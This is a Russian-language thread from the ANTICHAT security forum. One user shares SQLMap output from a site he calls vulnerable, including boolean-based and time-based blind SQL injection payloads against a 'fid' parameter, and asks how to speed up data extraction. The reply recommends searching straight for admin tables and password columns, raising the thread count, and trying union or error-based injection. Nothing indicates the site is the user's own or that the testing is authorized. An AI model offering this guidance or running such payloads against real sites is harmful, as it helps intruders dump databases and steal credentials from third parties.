Вопросы по SQLMap

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

11.11.2017, 15:04

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от Muracha

Muracha said:
↑
Есть уязвимый сайт, который очень долго выводит и перебирает базы данных, таблицы, колонки.

Код:

Code:
arameter: fid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: &fid=2656 AND 5461=5461

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: &fid=2656 AND SLEEP(10)
---

Понимаю,что слепая иньекция, но можно ли увеличить скорость перебора?

Код:

Code:
[13:14:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:14:26] [INFO] retrieved:
[13:14:28] [WARNING] reflective value(s) found and filtering out
77

тут лучше тогда сразу искать нужные данные --search -T admin и т.д --search -C pass чтобы время не тратить. И потоков побольше , если можно --threads=15!

Может еще есть какие уязвимости, которые можно в Union или Error раскрутить